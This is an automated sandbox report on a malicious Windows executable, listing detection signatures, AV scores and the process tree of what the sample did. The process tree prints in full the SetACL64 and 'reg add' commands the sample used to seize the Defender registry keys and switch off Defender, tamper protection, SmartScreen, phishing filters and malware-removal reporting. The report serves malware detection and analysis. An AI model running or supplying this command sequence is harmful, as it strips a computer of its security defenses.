
Windows Analysis Report
Ms63nDrOBa.exe

Overview

General Information

Sample name: Ms63nDrOBa.exe
renamed because original name is a hash value
Original sample name: ad3a57927668a9560b5f01d7ff54c881.exe
Analysis ID: 1472092
MD5: ad3a57927668a9560b5f01d7ff54c881
SHA1: d0c66b9b5e5f58baff91f23f91a67fd3e8359662
SHA256: efc2d3750186e0038a9bfb4e292298f92bce9f80d2af0a992a3e5fe0c9f29ecf
Tags: exe

Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds extensions / path to Windows Defender exclusion list (Registry)
Disable Microsoft Windows Malicious Software Removal Tool Heartbeat Telemetry
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Disables the Smart Screen filter
Disables the phishing filter of Microsoft Edge
Machine Learning detection for dropped file
Machine Learning detection for sample
Uses cmd line tools excessively to alter registry or file data
Binary contains a suspicious time stamp
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Windows Defender Exclusions Added - Registry
Too many similar processes found
Uses 32bit PE files
Uses reg.exe to modify the Windows registry

Classification

  • System is w10x64
  • Ms63nDrOBa.exe (PID: 6564 cmdline: "C:\Users\user\Desktop\Ms63nDrOBa.exe" MD5: AD3A57927668A9560B5F01D7FF54C881)
    • cmd.exe (PID: 6184 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nse5B61.tmp\bn.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • SetACL64.exe (PID: 4364 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)
    • cmd.exe (PID: 1824 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nse5B61.tmp\bn1.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • SetACL64.exe (PID: 1812 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)
      • SetACL64.exe (PID: 2420 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)
      • SetACL64.exe (PID: 3108 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)
      • SetACL64.exe (PID: 2704 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)
      • SetACL64.exe (PID: 5372 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)
      • SetACL64.exe (PID: 2812 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)
      • SetACL64.exe (PID: 1176 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)
      • reg.exe (PID: 6492 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 2404 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 6320 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 5172 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 6052 cmdline: reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 4032 cmdline: reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 5224 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 5672 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 4868 cmdline: reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 3248 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 6784 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 5696 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 6468 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 4196 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 3520 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 3928 cmdline: reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 3432 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7124 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 4364 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 5052 cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 6548 cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 2612 cmdline: reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 1584 cmdline: reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 3108 cmdline: reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 5948 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 1592 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 616 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 1080 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 4904 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 5308 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • cleanup
No configs have been found
No yara matches
Source: Registry Key set Author: Christian Burkard (Nextron Systems): Data: Details: 1, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 1080, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\DisableAutoExclusions
No Snort rule has matched

AV Detection

Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\PowerRun64.exe ReversingLabs: Detection: 20%
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\PowerRun64.exe Virustotal: Detection: 19%
Source: Ms63nDrOBa.exe ReversingLabs: Detection: 28%
Source: Ms63nDrOBa.exe Virustotal: Detection: 33%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 98.8% probability
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\uxdabweej.exe Joe Sandbox ML: detected
Source: Ms63nDrOBa.exe Joe Sandbox ML: detected
Source: Ms63nDrOBa.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Ms63nDrOBa.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdbG source: SetACL64.exe, 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000004.00000000.2139148802.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2144133422.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2143385127.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2144794323.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2145879994.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2146220599.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2147316022.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2151463967.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2147801505.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2152310864.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2153178276.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.2153676169.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.2154453959.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.2154984222.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.2156028330.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr
Source: Binary string: D:\Projects\New\win_version_csharp\obj\Release\win_version_csharp.pdb source: win_version_csharp.exe.0.dr
Source: Binary string: D:\Projects\ConsoleApplication9\ConsoleApplication9\obj\Release\ConsoleApplication9.pdb source: uxdabweej.exe.0.dr
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdb source: SetACL64.exe, 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000004.00000000.2139148802.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2144133422.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2143385127.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2144794323.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2145879994.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2146220599.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2147316022.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2151463967.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2147801505.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2152310864.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2153178276.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.2153676169.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.2154453959.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.2154984222.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.2156028330.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr

Change of critical system settings

Source: C:\Windows\SysWOW64\reg.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions DisableAutoExclusions
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe Code function: 0_2_00405C40 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C40
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe Code function: 0_2_00406891 FindFirstFileW,FindClose,0_2_00406891
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe Code function: 0_2_00402910 FindFirstFileW,0_2_00402910
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C17296D0 FindFirstFileW,GetLastError,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,4_2_00007FF7C17296D0
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C175C76C _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,4_2_00007FF7C175C76C
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C173CF15 MoveFileExW,FindFirstFileW,GetLastError,FindNextFileW,DeleteFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,4_2_00007FF7C173CF15
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: PowerRun64.exe.0.dr String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: PowerRun64.exe.0.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: PowerRun64.exe.0.dr String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: Ms63nDrOBa.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr String found in binary or memory: http://ocsp.comodoca.com0
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: PowerRun64.exe.0.dr String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: PowerRun64.exe.0.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: PowerRun64.exe.0.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: PowerRun64.exe.0.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: SetACL64.exe, SetACL64.exe, 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000004.00000000.2139148802.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2144133422.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2143385127.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2144794323.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2145879994.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2146220599.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2147316022.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2151463967.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2147801505.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2152310864.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2153178276.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.2153676169.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.2154453959.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.2154984222.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.2156028330.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr String found in binary or memory: https://helgeklein.com
Source: SetACL64.exe, SetACL64.exe, 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000004.00000000.2139148802.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2144133422.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2143385127.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2144794323.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2145879994.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2146220599.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2147316022.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2151463967.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2147801505.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2152310864.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2153178276.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.2153676169.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.2154453959.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.2154984222.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.2156028330.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr String found in binary or memory: https://helgeklein.com.
Source: SetACL64.exe, SetACL64.exe, 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000004.00000000.2139148802.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2144133422.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2143385127.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2144794323.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2145879994.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2146220599.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2147316022.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2151463967.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2147801505.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2152310864.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2153178276.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.2153676169.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.2154453959.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.2154984222.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.2156028330.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr String found in binary or memory: https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: PowerRun64.exe.0.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe Code function: 0_2_004056F8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056F8
Source: reg.exe Process created: 68
